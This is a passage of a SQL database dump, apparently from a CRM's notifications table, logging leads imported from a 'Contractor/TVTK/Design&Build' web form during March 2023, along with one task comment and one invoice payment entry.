(2152, 1, 1, '2023-03-02 14:36:51', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=41', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2158, 1, 1, '2023-03-02 14:37:28', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=42', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2164, 1, 1, '2023-03-02 14:38:09', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=43', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2170, 1, 1, '2023-03-02 14:38:37', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=44', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2176, 1, 1, '2023-03-02 20:20:46', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=45', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2182, 1, 1, '2023-03-03 07:42:43', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=46', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2211, 1, 1, '2023-03-04 09:51:52', 'not_task_new_comment', 18, 0, 'Sương Võ', 1, NULL, '#taskid=139#comment_8', 'a:1:{i:0;s:35:\"Tư vấn khách - 27Feb - @Sương\";}'),
(2213, 1, 1, '2023-03-04 15:57:54', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=47', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2219, 1, 1, '2023-03-04 16:08:11', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=48', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2225, 1, 1, '2023-03-04 16:09:08', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=49', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2231, 1, 1, '2023-03-04 16:10:20', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=50', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2237, 1, 1, '2023-03-04 16:13:25', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=51', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2243, 1, 1, '2023-03-04 16:14:28', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=52', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2249, 1, 1, '2023-03-04 16:21:25', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=53', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2255, 1, 1, '2023-03-04 16:38:53', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=54', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2261, 1, 1, '2023-03-04 16:49:40', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=55', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2267, 1, 1, '2023-03-04 16:51:57', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=56', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2272, 1, 1, '2023-03-06 09:34:39', 'not_invoice_payment_recorded', 0, 0, '', 1, 1, 'invoices/list_invoices/272', 'a:1:{i:0;s:10:\"INV-268-23\";}'),
(2274, 1, 1, '2023-03-06 13:55:09', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=57', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2280, 1, 1, '2023-03-06 13:55:50', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=58', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2286, 1, 1, '2023-03-06 13:58:22', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=59', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2292, 1, 1, '2023-03-06 13:59:05', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=60', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2298, 1, 1, '2023-03-06 13:59:52', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=61', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2304, 1, 1, '2023-03-06 14:01:30', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=62', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2317, 1, 1, '2023-03-07 13:54:26', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=64', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2323, 1, 1, '2023-03-07 13:55:09', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=65', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2329, 1, 1, '2023-03-07 13:56:16', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=66', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2335, 1, 1, '2023-03-07 13:57:35', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=67', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2341, 1, 1, '2023-03-07 13:58:33', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=68', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2347, 1, 1, '2023-03-07 13:59:24', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=69', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2353, 1, 1, '2023-03-07 14:00:09', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=70', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2359, 1, 1, '2023-03-07 14:00:46', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=71', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2365, 1, 1, '2023-03-07 14:01:32', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=72', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2371, 1, 1, '2023-03-07 14:04:12', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=73', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2384, 1, 1, '2023-03-11 11:48:33', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=75', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2390, 1, 1, '2023-03-14 10:10:07', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=76', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2396, 1, 1, '2023-03-14 10:12:11', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=77', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2402, 1, 1, '2023-03-14 10:13:02', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=78', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2408, 1, 1, '2023-03-14 10:13:47', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=79', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2414, 1, 1, '2023-03-14 10:14:29', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=80', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2420, 1, 1, '2023-03-14 10:15:04', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=81', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2426, 1, 1, '2023-03-14 10:15:38', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=82', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2432, 1, 1, '2023-03-14 10:16:17', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=83', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2438, 1, 1, '2023-03-14 10:16:53', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=84', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2444, 1, 1, '2023-03-14 10:17:29', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=85', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2450, 1, 1, '2023-03-14 14:48:58', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=86', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2456, 1, 1, '2023-03-14 14:51:31', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=87', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2462, 1, 1, '2023-03-14 14:55:57', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=88', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2468, 1, 1, '2023-03-14 14:57:46', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=89', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2474, 1, 1, '2023-03-14 15:00:46', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=90', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2480, 1, 1, '2023-03-14 15:04:00', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=91', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2486, 1, 1, '2023-03-14 15:08:06', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=92', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2492, 1, 1, '2023-03-14 15:13:47', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=93', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2498, 1, 1, '2023-03-14 15:16:28', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=94', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2504, 1, 1, '2023-03-15 10:33:23', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=95', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2510, 1, 1, '2023-03-15 10:36:00', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=96', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2516, 1, 1, '2023-03-15 10:37:02', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=97', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2522, 1, 1, '2023-03-15 10:37:37', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=98', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2528, 1, 1, '2023-03-15 10:38:13', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=99', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2534, 1, 1, '2023-03-15 11:06:47', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=100', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2540, 1, 1, '2023-03-15 11:07:46', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=101', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2546, 1, 1, '2023-03-15 11:08:32', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=102', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2552, 1, 1, '2023-03-15 11:09:19', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=103', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2558, 1, 1, '2023-03-15 11:09:49', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=104', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2564, 1, 1, '2023-03-15 14:42:08', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=105', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2570, 1, 1, '2023-03-15 14:48:22', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=106', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2576, 1, 1, '2023-03-15 14:49:10', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=107', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2582, 1, 1, '2023-03-15 14:49:56', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=108', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2588, 1, 1, '2023-03-15 14:50:30', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=109', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2594, 1, 1, '2023-03-15 14:51:10', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=110', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2600, 1, 1, '2023-03-15 14:51:51', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=111', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2606, 1, 1, '2023-03-15 14:56:22', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=112', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2612, 1, 1, '2023-03-15 15:06:15', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=113', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2618, 1, 1, '2023-03-16 13:57:45', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=114', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2624, 1, 1, '2023-03-16 13:58:22', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=115', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2630, 1, 1, '2023-03-16 13:59:04', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=116', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2636, 1, 1, '2023-03-16 13:59:38', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=117', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2642, 1, 1, '2023-03-16 14:00:22', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=118', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2648, 1, 1, '2023-03-16 14:02:58', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=119', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2654, 1, 1, '2023-03-16 14:04:03', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=120', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2660, 1, 1, '2023-03-16 15:16:47', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=121', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2666, 1, 1, '2023-03-16 15:17:21', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=122', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2672, 1, 1, '2023-03-16 15:17:56', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=123', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2678, 1, 1, '2023-03-16 15:18:26', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=124', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2684, 1, 1, '2023-03-16 15:19:02', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=125', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2690, 1, 1, '2023-03-16 15:19:35', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=126', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2703, 1, 1, '2023-03-17 13:49:40', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=128', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2709, 1, 1, '2023-03-17 13:50:29', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=129', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2715, 1, 1, '2023-03-17 13:51:14', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=130', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2721, 1, 1, '2023-03-17 13:52:04', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=131', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2727, 1, 1, '2023-03-17 13:52:58', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=132', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2733, 1, 1, '2023-03-17 13:53:46', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=133', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2739, 1, 1, '2023-03-17 13:55:27', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=134', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2765, 1, 1, '2023-03-20 13:36:19', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=135', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2771, 1, 1, '2023-03-20 13:37:53', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=136', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2777, 1, 1, '2023-03-20 13:38:48', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=137', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2783, 1, 1, '2023-03-20 13:39:27', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=138', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2789, 1, 1, '2023-03-20 13:40:22', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=139', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2795, 1, 1, '2023-03-20 13:41:05', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=140', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2801, 1, 1, '2023-03-20 13:41:45', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=141', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2807, 1, 1, '2023-03-20 14:59:52', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=142', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2813, 1, 1, '2023-03-20 15:00:31', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=143', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2819, 1, 1, '2023-03-20 15:01:24', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=144', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2825, 1, 1, '2023-03-20 15:02:18', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=145', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2831, 1, 1, '2023-03-20 15:04:52', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=146', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2837, 1, 1, '2023-03-20 15:06:09', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=147', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2843, 1, 1, '2023-03-20 15:19:44', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=148', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2849, 1, 1, '2023-03-20 15:21:27', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=149', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2858, 1, 1, '2023-03-21 13:50:28', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=150', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2864, 1, 1, '2023-03-21 13:50:59', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=151', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2870, 1, 1, '2023-03-21 13:51:27', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=152', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2876, 1, 1, '2023-03-21 13:52:17', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=153', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2882, 1, 1, '2023-03-22 10:43:05', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=154', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2888, 1, 1, '2023-03-22 10:43:39', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=155', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2894, 1, 1, '2023-03-22 10:44:24', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=156', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2900, 1, 1, '2023-03-22 10:45:02', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=157', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2906, 1, 1, '2023-03-22 10:45:29', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=158', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2912, 1, 1, '2023-03-22 10:45:54', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=159', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2918, 1, 1, '2023-03-22 10:46:22', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=160', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2924, 1, 1, '2023-03-22 11:28:19', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=161', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2930, 1, 1, '2023-03-22 11:28:56', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=162', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2936, 1, 1, '2023-03-22 11:29:51', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=163', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2942, 1, 1, '2023-03-23 09:31:33', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=164', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2948, 1, 1, '2023-03-23 09:32:08', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=165', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2954, 1, 1, '2023-03-23 09:33:09', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=166', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2960, 1, 1, '2023-03-23 09:33:37', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=167', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2966, 1, 1, '2023-03-23 09:34:05', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=168', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2972, 1, 1, '2023-03-23 09:34:31', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=169', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2978, 1, 1, '2023-03-23 10:12:44', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=170', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2984, 1, 1, '2023-03-23 10:13:24', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=171', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2990, 1, 1, '2023-03-23 10:13:49', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=172', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2996, 1, 1, '2023-03-23 10:14:39', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=173', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3024, 1, 1, '2023-03-24 09:39:36', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=174', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3030, 1, 1, '2023-03-24 09:40:05', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=175', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3036, 1, 1, '2023-03-24 09:40:38', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=176', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3042, 1, 1, '2023-03-24 09:41:26', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=177', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3048, 1, 1, '2023-03-24 09:42:12', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=178', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3054, 1, 1, '2023-03-24 09:42:58', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=179', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3060, 1, 1, '2023-03-25 09:02:00', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=180', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3066, 1, 1, '2023-03-25 09:03:14', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=181', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3072, 1, 1, '2023-03-25 09:03:55', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=182', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3078, 1, 1, '2023-03-25 09:05:00', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=183', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3084, 1, 1, '2023-03-25 09:06:45', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=184', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3090, 1, 1, '2023-03-25 09:07:22', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=185', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3096, 1, 1, '2023-03-25 09:21:38', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=186', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3102, 1, 1, '2023-03-25 09:23:07', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=187', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3108, 1, 1, '2023-03-25 09:50:22', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=188', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3114, 1, 1, '2023-03-25 09:51:34', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=189', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3120, 1, 1, '2023-03-25 09:52:18', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=190', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3126, 1, 1, '2023-03-25 11:03:42', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=191', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3132, 1, 1, '2023-03-25 11:04:17', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=192', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3138, 1, 1, '2023-03-25 11:04:45', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=193', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
